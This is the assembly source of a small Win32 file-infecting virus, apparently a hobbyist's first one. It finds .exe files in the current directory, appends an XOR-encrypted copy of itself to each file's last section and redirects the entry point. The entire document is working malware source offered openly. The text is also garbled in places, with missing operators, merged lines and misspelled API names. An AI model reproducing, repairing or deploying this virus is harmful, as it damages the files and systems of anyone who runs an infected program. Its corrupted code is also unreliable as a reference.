

[W32.SIMPLE BY XXXXXX]

; -_-_-_-_-_ _ _ _ _ _ _ _ _ _ _ _-_-_-_-_ _ _ _ _ _ _ _- _-_-_-_-_-_-_-_-_-

This is a very small and simple win32 pe infector .. it infects ONLY

Files in the current directory. This virus is not supposed to be in

The Wild So I didn't want to include Windir Infection or Directory

Traversal ... i Just Wanted to Write A Small Stable Win32 Virus :)

There's not much to mention About this except a few Things: i don't

Use file-mapping, look why below. All The Routines Are Not Copied

From Someone else. Coz this is my first win32 Virus I Read a Couple

; Of Tutors But The Thing Is I Tried To Understand Things Instead of

; Just Paste Code. I Tried My Best In Optimizing Common Structure

LIKE INFECTION AND EXPORT-TABLE Scanning. The Encryption is Lame AS

; Fuck ... so ... it's just my first virus don't expect too much :)

; Please write to [xxxxx@gmx.net] xxxxxx

; -_-_-_-_-_ _ _ _ _ _ _ _ _ _ _ _-_-_-_-_ _ _ _ _ _ _ _- _-_-_-_-_-_-_-_-_-

.486

.Model flat, stdcall

Option CaseMAP: NONE

INCLUDE /MASM32/INCLUDE / WANEL32.INC

INCLUDELIB /MASM32/LIB/kernel32.lib

Virus_size EQU Virus_END - Virus_Start

Max_path EQU 104H

Of_read equ 000h

GHND EQU 002H OR 040H

FILE_ATTRIBUTE_NORMAL EQU 080H

.Code

First_gen:

PUSH 0

Call EXITPROCESS

Virus_Start:

Pushhad

Call delta

Delta: POP EBP

Sub EBP, Delta; EBP = DELTA OFFSET

XOR_KEY: MOV DH, 0; WILL BE PATCHED ...

Lea ESI, [EBP E_START]; SO NO XOR EDX, EDX :)

PUSH ESI

MOV ECX, Virus_END - E_START

; _________________ _ _ _ [-Encrypt-] _ _ _ __

Encrypt: XOR BYTE PTR [ESI], DH; EN / DE-CRYPTS THE VIRUS_BDY

ROL DH, 1; Very Lame I Know ...

Inc ESI

Dec ECX

JNZ ENCRYPT

RET

E_START: CALL GET_KERNEL; GET KERNEL BASEMOV ECX, 14

Lea ESI, [EBP ___kernel32]

Call get_apis; get kernel API's

Call Infect_Dir; Infect Some Files

ERR_EXT: POPAD

Hreturn: Push DWORD PTR Offset First_gen; Return to Host

Ret; Will BE PATCHED LATER

; _________________ _ _ _ [-Get_kernel-] _ _ _ __

GET_KERNEL:; Returns the Kernel Base

MOV ECX, [ESP 9 * 4]; Simple But Small :)

@@: DEC ECX

Movzx EDX, Word PTR [ECX 03CH]; EDX = Pointer to PE_HDR

CMP ECX, [ECX EDX 034H]; Compare Current Base with

JNZ @B; The Kernel Image_Base (MZ)

MOV [EBP _KERNEL], ECX; Store Result

MOV [EBP _DEFAULT], ECX

RET

; ____________________ [-get_apis-] _ _ _ __

GET_APIS:; Scans Throught API Table

INC ESI; and RETURNS Addresses

Push ECX

Call get_api; search API Address

POP ECX

Movzx EBX, Byte Ptr [ESI - 1]

Add ESI, EBX; Store Address in The

MOV [ESI], Eax; API Table ...

Add ESI, 4

Loop get_apis; Next One

RET

; _________________ _ _ _ [-gET_API-] _ _ _ __

GET_API:; Scans for a Single API ADR

MOV EDX, [EBP _DEFAULT]; EDX = Default Module Base

Add Edx, [EDX 03CH]; Offset PE_HEADER

MOV EDX, [EDX 078H]; EDX = PTR EXPORT_DIR RVA

Add Edx, [EBP _DEFAULT]; BASE

MOV EDI, [EDX 020H]; EDI = PTR Address_of_names RVA

Add Edi, [EBP _DEFAULT]; BASE

MOV EDI, [EDI]; EDI = PTR ADR_OF_NAMES RVA

Add Edi, [EBP _DEFAULT]; BASE

MOV Eax, [EDX 018H]; EAX = Number_Of_Names

XOR EBX, EBX

NXT_ONE: INC EBX

Movzx ECX, Byte Ptr [ESI - 1]; LengHT of Spezifed API Name

PUSH ESI

Push EDI

Repz Cmpsb; Compare API Name with

POP EDI; Export EntryPoP ESI

JZ Found

Push EAX

XOR Al, Al

ScaSB; Get Next One

JNZ $ - 1

POP EAX

Dec EAX; Decrease Number_of_names

JZ Err_ext

JMP NXT_ONE

Found: MOV ECX, [EDX 024H]; ECX = PTR NBR_NAME_ORDS RVA

Add ECX, [EBP _DEFAULT]; BASE

Dec EBX

Movzx Eax, Word PTR [ECX EBX * 2]; EAX = Ordinal Of Function

MOV EBX, [EDX 01CH]; EBX = PTR ADR_OF_FUNCTIONS RVA

Add EBX, [EBP _DEFAULT]; BASE

MOV EAX, [EBX EAX * 4]; EAX = Function RVA !!!!

Add Eax, [EBP _DEFAULT]; BASE

RET

; _________________ _ _ _ [-infect_directory-] _ _ ___

Infect_dir:; Search All Executables in

Lea Eax, [EBP W32Finddata]; The Spezifed Directory

Push EAX

Lea Eax, [EBP File_Mask]

Push EAX

Call [EBP _FINDFIRSTFILE]

INC EAX

JZ _S_OUT

Dec EAX

MOV [EBP S_HANDLE], EAX

_S_scan:

CMP [EBP FileSizeh], 0; ONLY FILES Under 4GIGS ...

JNZ _next

Call infect_file; pefact so infect it!

_Next:

Lea Eax, [EBP W32FindData]

Push EAX

Push [EBP S_HANDLE]

Call [EBP _FINDNEXTFILE]

Test Eax, EAX

JNZ _S_SCAN

_S_close:

Push [EBP S_HANDLE]

Call [EBP _FINDCLOSE]

_S_OUT: RET

; _________________ _ _ _ [-Open_File-] _ _ _ __

Infect_file:; Opens a File And Allocate MEM

Push file_attribute_normal; I don't use filemapping coz

Lea Eax, [EBP FileName]; I Simply Hate ... Imagine

Push Eax; You Map A File and Begin To

Call [EBP _SETFILEATTRIBUTES]; make the first changes, now

You realize the pe is not

Push of_read; valid or corrupted (Packed

Lea Eax, [EBP FileName]; Files or Some MS PE's

Push Eax; [Outlook]) ... this pe shopCall [EBP __LOPEN]; beh history now :) i buy it

MOV [EBP FILEHANDLE], EAX; Before and Must Say That

MOV EAX, [EBP FileSize]; I Had Tons of Problems with

Add [EBP MAPSIZE], EAX; THIS TECHNIQUE ...

Push [EBP MAPSIZE]

Push Ghnd

Call [EBP _GLOBALLOC]

MOV [EBP H_Buffer], EAX

Push EAX

Call [EBP _GLOBALLOCK]; Allocate Mem for the File

Test Eax, Eax; Virus_Body

JZ _exit

MOV [EBP M_BUFFER], EAX

Push [EBP FileSize]

Push [EBP M_Buffer]

Push [EBP FILEHANDLE]

Call [EBP __LREAD]; Read Entire File to Buffer

Push [EBP FILEHANDLE]

Call [EBP __LCLOSE]

; ____________________ [-infect_file-] _ _ ___

MOV EDI, [EBP M_Buffer]; EDI = Pointer to Mem Block

CMP Word PTR [EDI], "ZM"; Do Some Checks (MZ / PE / Infmark)

Jnz _exit

Add Edi, [EDI 03CH]; EDI = Pointer to PE_HDR

CMP Word PTR [EDI], "EP"

Jnz _exit

CMP DWORD PTR [EDI 04CH], 0

Jnz _exit

RETURN LAST Section

MOV ECX, [EDI 074H]; ECX = Number_Of_rva_and_sizes

LEA ECX, [ECX * 8 EDI]; x 8 offset pe_header

Movzx Eax, Word PTR [EDI 006H]; EAX = Number_Of_sections

Dec Eax; - 1

Lea EBX, [EAX EAX * 4]; EBX = EAX X 28H

Lea EBX, [EBX * 8]; ...

Lea EBX, [EBX ECX 078H]; EBX = EBX ECX 078H

MOV EAX, Virus_Size

XADD [EBX 008H], EAX; Change Virtualsize

CMP EAX, [EBX 010H]

Ja _exit

Push EAX

Push DWORD PTR [EBX 010H]

Add Eax, Virus_size

XOR EDX, EDX

MOV ECX, [EDI 03CH]

Div ECX

INC EAX

Imul Eax, ECX

MOV [EBX 010H], EAX; Change Size_OF_RAW_DATAPOP ECX

Mov Eax, [EBX 010H]

Sub Eax, Ecx; Change Size_OF_IMAGE

Add [EDI 050H], ​​EAX

Change Attribs & Infmark

OR DWORD PTR [EBX 024H], 0C0000000H

MOV DWORD PTR [EDI 04CH], 'BDHP'

POP EAX

Add Eax, [EBX 00CH]

XCHG [EDI 028H], EAX; Change Entry_Point

Add Eax, [EDI 034H]

MOV EDI, [EBX 014H]; Virus_POS = Virt_ADR

Add Edi, [EBX 008H]; Virt_size

MOV ECX, Virus_Size

Sub EDI, ECX

Add Edi, [EBP M_Buffer]

Lea ESI, [EBP VIRUS_START]

Rep Movsb; Write Virus_Body To Buffer

; _________________ _ _ _ [-close_File-] _ _ _ __

Add Byte PTR [EBP XOR_KEY 1], 10

MOV DH, BYTE PTR [EBP XOR_KEY 1]

MOV BYTE PTR [EDI - (Virus_END - XOR_KEY) 1], DH

MOV [EDI - (Virus_END - HRETURN) 1], EAX

Lea ESI, [EDI - (Virus_end - E_START)]

MOV ECX, Virus_END - E_START

Call Encrypt; Encrypt Virus_Body

Push 0; truncate file andoke

Lea Eax, [EBP FileName]; File for Write Access

Push Eax; (File Attribs Are Set Above)

Call [EBP __LCREAT]

INC EAX

JZ _exit

MOV EAX, [EBX 014H]; filesize = virt_adr

Add Eax, [EBX 010H]; SIZE_OF_RAW_DATA

Push EAX

Push [EBP M_Buffer]; Write Buffer To File ...

Push [EBP FILEHANDLE]; Close File ...

Call [EBP __LWRITE]; Get Rid of Those Memory

Push [EBP FILEHANDLE]; POINTERS AND FREE MEMORY ...

Call [EBP __LCLOSE]; SET OLD File Attributes

_Exit: push [EBP M_Buffer]

Call [EBP _GLOBALUNLOCK]

Push [EBP H_Buffer]

Call [EBP _GLOBALFREE]

Push [EBP F_OATITRIBS]

Lea EAX, [EBP FileName]

Push EAX

Call [EBP _SETFILEATTRIBUTES]

RET

; _________________ _ _ _ [-virus_Data-] _ _ _ __

___Kernel32:;

DB 06, "_ lopen"; API TABLE

__Lopen DD 0; Will BE Filled Up with ADR'S

DB 06, "_ loread"; from a spezifed module-export

__Lread DD 0; Table (in this case kernel32)

DB 07, "_ lwrite"

__LWRITE DD 0

DB 07, "_ lclose"

__Lclose DD 0

DB 07, "_ lcreat"

__Lcreat DD 0

DB 11, "GLOBALLOC"

_GlobalAlloc DD 0

DB 10, "GLOBALLOCK"

_Globalock DD 0

DB 12, "GlobalUnlock"

_Globalunlock DD 0

DB 10, "GlobalFree"

_GlobalFree DD 0

DB 13, "findfirstfile"

_Findfirstfile dd 0

DB 12, "findnextfile"

_FindNextFile DD 0

DB 09, "FindClose"

_FindClose DD 0

DB 17, "SetFileAttributes"

_SetFileAttributes DD 0

DB 17, "getFileAttributes"

_GetfileAttributes DD 0

_Kernel DD 0; Base Placeholders

_Default DD 0

Mapize DD Virus_size 1000H

FileHandle DD 0

H_Buffer DD 0

M_Buffer DD 0

W32FindData:; Win32_Find_Data Struc

F_oattribs DD 0

DD 6 DUP (0)

FileSizeh DD 0

FILSIZE DD 0

DD 2 DUP (0)

FileName DB Max_Path Dup (0)

DB 14 DUP (0)

S_handle DD 0

FILE_MASK DB "* .exe", 0

Virus_end:

END VIRUS_START

